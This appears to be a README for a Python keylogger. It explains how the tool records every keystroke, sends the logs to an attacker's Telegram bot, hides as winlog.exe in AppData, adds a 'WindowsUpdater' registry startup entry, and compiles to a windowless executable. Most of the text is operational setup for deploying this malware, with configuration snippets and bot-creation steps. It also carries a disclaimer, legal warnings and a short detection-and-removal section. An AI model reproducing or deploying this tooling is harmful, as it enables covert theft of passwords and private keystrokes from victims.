This script is a malicious keylogger designed to compromise computer systems and steal sensitive information. Its use violates laws in nearly every country.
This Python script is a sophisticated keylogger with the following capabilities:
- Records every key pressed on the target system
- Captures:
- Regular text characters
- Special keys (Shift, Ctrl, Alt, etc.)
- Space bar
- Function keys (F1-F12)
- Arrow keys and navigation keys
- All other keyboard inputs
- Sends captured keystroke logs to a remote attacker via Telegram API
- Sends reports at configurable time intervals
- Handles connection failures gracefully (logs continue if internet is unavailable)
- Installs itself as a hidden, persistent application on Windows systems
- Copies itself to the hidden
AppDatadirectory - Adds itself to Windows Registry startup programs
- Runs automatically when the victim logs in
- Hides its file using Windows system attributes
- Runs in the background with no visible interface
- No taskbar icon or window
- Conceals its presence from casual users
- Marks itself as a hidden system file
This script requires specific Python libraries and system access.
Install all dependencies using:
pip install -r requirements.txtor install individually:
pip install pynput requests python-dotenv- Windows operating system (tested on Windows 10/11)
- Administrator privileges (for registry modifications)
- Internet connectivity (to send logs via Telegram)
The script now uses environment variables from a .env file for configuration. Copy the env.example file and rename it to .env, then fill in your values.
Required Configuration File (.env):
# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=YOUR_BOT_TOKEN_HERE
TELEGRAM_CHAT_ID=YOUR_CHAT_ID_HERE
REPORT_INTERVAL=60
PERSISTENCE_FILENAME=winlog.exeScript Imports: The script now includes dotenv library for configuration:
import dotenv
dotenv.load_dotenv()
# Configuration from .env file
bot_token = os.getenv('TELEGRAM_BOT_TOKEN', 'YOUR_BOT_TOKEN_HERE')
chat_id = os.getenv('TELEGRAM_CHAT_ID', 'YOUR_CHAT_ID_HERE')
interval = int(os.getenv('REPORT_INTERVAL', 60))
filename = os.getenv('PERSISTENCE_FILENAME', "winlog.exe")-
Create a Telegram Bot:
- Open Telegram and search for
@BotFather - Send
/newbotand follow instructions - Copy the generated bot token
- Open Telegram and search for
-
Get Chat ID:
- Search for your bot username and start a conversation
- Visit
https://api.telegram.org/bot{YOUR_BOT_TOKEN}/getUpdates - Find your chat ID in the response
# 1. Install required libraries
pip install pynput requests
# 2. Modify the configuration variables in keylogger.py
# Replace TERA_CHAT_ID with your actual chat ID
# 3. Run the script (Windows only)
python keylogger.py
# 4. Compile to executable (optional)
pip install pyinstaller
pyinstaller --noconsole --onefile keylogger.py- The script checks if it's already installed in the hidden location
- If not, it copies itself to
%APPDATA%/winlog.exe - Sets the file as hidden and system file
- Adds itself to Windows startup registry
- Launches the new hidden instance
- Starts capturing keystrokes
- Sends logs to Telegram at specified intervals
- Check for
winlog.exein%APPDATA%directory - Look for "WindowsUpdater" entry in startup programs
- Monitor network traffic to
api.telegram.org
- Open Task Manager (Ctrl+Shift+Esc)
- Look for any suspicious processes
- Open Registry Editor (regedit)
- Navigate to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - Delete the "WindowsUpdater" entry
- Delete
%APPDATA%/winlog.exe - Restart the computer
- Computer Fraud and Abuse Act (CFAA) - United States
- Cybercrime Laws - Most countries worldwide
- GDPR and Privacy Laws - European Union and many other regions
- Criminal Charges: Felony charges with potential jail time
- Fines: Up to hundreds of thousands of dollars
- Permanent Record: Criminal record that affects employment and travel
- Civil Lawsuits: Victims can sue for damages
This script is provided exclusively for security research, educational purposes, and defensive security testing. You must have written, explicit authorization from the system owner before using or testing this script on any computer system.
Unauthorized use of this script to gain access to computer systems or steal information is a serious crime with severe legal consequences.
Understanding how keyloggers work helps security professionals:
- Develop better anti-malware solutions
- Educate users about cyber threats
- Implement effective security measures
- Test and strengthen system defenses
This knowledge should only be used to protect systems, not to attack them.